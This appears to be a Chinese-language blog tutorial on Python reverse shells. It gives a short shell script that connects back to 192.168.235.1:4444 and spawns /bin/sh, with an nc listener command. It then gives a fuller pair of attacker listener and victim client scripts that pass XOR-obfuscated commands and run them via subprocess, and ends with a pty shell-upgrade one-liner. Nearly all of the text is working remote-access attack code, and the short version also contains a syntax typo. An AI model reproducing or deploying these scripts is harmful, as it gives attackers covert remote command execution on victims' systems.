python反弹shell
/etc/crontab设置定期执行的任务,修改需要root权限
简易版
python反弹shell的文件:
1 #!/usr/bin/python 2 import os,subprocess,socket 3 4 s=socket.socket(socket.AF_INET,socket,SOCK_STREAM) 5 s.connect((192.168.235.1,4444)) 6 os.dup2(s.fileno(),0) 7 os.dup2(s.fileno(),1) 8 os.dup2(s.fileno(),2) 9 p=subprocess.call(["/bin/sh","-i"])
攻击机使用监听命令: nc -vlp 4444
完整版
攻击机(监听端口444得到shell)执行的文件:
1 #!/usr/bin/env python3 2 # -*- coding:utf-8 -*- 3 # Author:Ameng, jlx-love.com 4 5 from socket import * 6 import struct 7 8 9 client = socket(AF_INET,SOCK_STREAM) 10 client.bind(('0.0.0.0',4444)) 11 client.listen(5) 12 print('[+]Listening on port 4444...') 13 (conn,(ip,port)) = client.accept() 14 print('connect successfully to',ip) 15 16 def encrypt(data): 17 data = bytearray(data) 18 for i in range(len(data)): 19 data[i] ^= 0x23 20 return data 21 22 23 def decrypt(data): 24 data = bytearray(data) 25 for i in range(len(data)): 26 data[i] ^= 0x23 27 return data 28 29 30 while True: 31 cmd = input('~$ ').strip() 32 if len(cmd) == 0: 33 continue 34 cmd = encrypt(cmd.encode('utf-8')) 35 conn.send(cmd) 36 header = conn.recv(4) 37 total_size = struct.unpack('i',header)[0] 38 recv_size = 0 39 while recv_size < total_size: 40 recv_data = conn.recv(1024) 41 recv_size += len(recv_data) 42 recv_data = decrypt(recv_data) 43 print(recv_data.decode('utf-8'),end='')
靶机(被拿到shell)执行的文件:
1 #!/usr/bin/env python3 2 # -*- coding:utf-8 -*- 3 # Author:Ameng, jlx-love.com 4 5 from socket import * 6 import subprocess 7 import struct 8 9 10 11 server = socket(AF_INET,SOCK_STREAM) 12 server.connect(('192.168.235.1',4444)) 13 14 def encrypt(data): 15 data = bytearray(data) 16 for i in range(len(data)): 17 data[i] ^= 0x23 18 return data 19 20 21 def decrypt(data): 22 data = bytearray(data) 23 for i in range(len(data)): 24 data[i] ^= 0x23 25 return data 26 27 28 while True: 29 try: 30 cmd = server.recv(1024) 31 cmd = decrypt(cmd) 32 if len(cmd) == 0: 33 break 34 res = subprocess.Popen(cmd.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 35 stdout_res = res.stdout.read() 36 stderr_res = res.stderr.read() 37 result = stdout_res + stderr_res 38 result = encrypt(result) 39 total_size = len(result) 40 header = struct.pack('i',total_size) 41 server.send(header) 42 server.send(result) 43 except Exception: 44 break 45 server.close()
注:在靶机运行py文件时才能在攻击机执行命令,当停止运行则shell环境结束
得到shell的命令行优化指令:
python -c "import pty;pty.spawn('/bin/bash')"